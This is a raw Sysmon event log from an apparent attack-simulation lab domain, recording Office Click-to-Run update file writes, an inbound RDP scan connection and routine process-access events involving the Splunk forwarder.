14:53:57.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\RICHED20.DLL2021-04-20 14:53:57.378 11241100x800000000000000063529Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:57.347{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-001F-0409-1000-0000000FF1CE}\misc.exe2021-04-20 14:53:57.347 11241100x800000000000000063528Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:57.347{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-001F-040C-1000-0000000FF1CE}\misc.exe2021-04-20 14:53:57.347 11241100x800000000000000063527Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:57.347{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-001F-0C0A-1000-0000000FF1CE}\misc.exe2021-04-20 14:53:57.347 11241100x800000000000000063526Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:57.347{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-006E-0409-1000-0000000FF1CE}\misc.exe2021-04-20 14:53:57.347 11241100x800000000000000063525Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.315{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SOCIALCONNECTOR.DLL2021-04-20 14:53:57.315 11241100x800000000000000063524Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.315{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\tmpod.dll2021-04-20 14:53:57.315 11241100x800000000000000063523Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.284{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\VBA\VBA7.1\VBE7.DLL2021-04-20 14:53:57.284 11241100x800000000000000063522Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.269{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MAPIR.DLL2021-04-20 14:53:57.269 11241100x800000000000000063521Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.269{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\UmOutlookStrings.dll2021-04-20 14:53:57.269 11241100x800000000000000063520Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.144{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\NL7MODELS000A.dll2021-04-20 14:53:57.144 11241100x800000000000000063519Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.144{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSORES.DLL2021-04-20 14:53:57.144 11241100x800000000000000063518Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.144{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\NL7MODELS0009.dll2021-04-20 14:53:57.144 11241100x800000000000000063517Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.128{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\NL7MODELS000C.dll2021-04-20 14:53:57.128 11241100x800000000000000063516Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:57.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\EXCEL.EXE2021-04-20 14:53:57.112 11241100x800000000000000063515Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.097{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Uc.dll2021-04-20 14:53:57.097 11241100x800000000000000063514Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.097{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\UcAddinRes.dll2021-04-20 14:53:57.097 11241100x800000000000000063513Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.097{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONMAIN.DLL2021-04-20 14:53:57.097 11241100x800000000000000063512Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.097{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\UCAddin.dll2021-04-20 14:53:57.097 11241100x800000000000000063511Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.097{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PPCORE.DLL2021-04-20 14:53:57.097 11241100x800000000000000063510Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.097{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\ALRTINTL.DLL2021-04-20 14:53:57.097 11241100x800000000000000063509Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.097{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\XLINTL32.DLL2021-04-20 14:53:57.097 11241100x800000000000000063508Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.081{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\EMSMDB32.DLL2021-04-20 14:53:57.081 11241100x800000000000000063507Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.081{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mfc140u.dll2021-04-20 14:53:57.081 11241100x800000000000000063506Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.034{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CONTAB32.DLL2021-04-20 14:53:57.034 11241100x800000000000000063505Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.034{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\OUTLVBA.DLL2021-04-20 14:53:57.034 11241100x800000000000000063504Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.034{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSPTLS.DLL2021-04-20 14:53:57.034 11241100x800000000000000063503Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.034{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\WWLIB.DLL2021-04-20 14:53:57.034 11241100x800000000000000063502Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.034{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PPINTL.DLL2021-04-20 14:53:57.034 11241100x800000000000000063501Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:57.034{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OUTLOOK.EXE2021-04-20 14:53:57.019 11241100x800000000000000063500Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:57.019{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-core-file-l1-2-0.dll2021-04-20 14:53:57.019 354300x800000000000000049408Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:56.286{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com64356-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 10341000x800000000000000049407Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.946{85C0FFC9-EB05-607E-D106-00000000BB01}19721588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049406Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.837{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EB05-607E-D106-00000000BB01}1972C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049405Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.837{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049404Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.837{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049403Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.837{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049402Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.837{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049401Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.837{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049400Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.837{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049399Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.837{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049398Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.837{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049397Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.837{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049396Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.837{85C0FFC9-B7EC-607E-0500-00000000BB01}4161008C:\Windows\system32\csrss.exe{85C0FFC9-EB05-607E-D106-00000000BB01}1972C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000049395Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.837{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EB05-607E-D106-00000000BB01}1972C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000049394Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.838{85C0FFC9-EB05-607E-D106-00000000BB01}1972C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 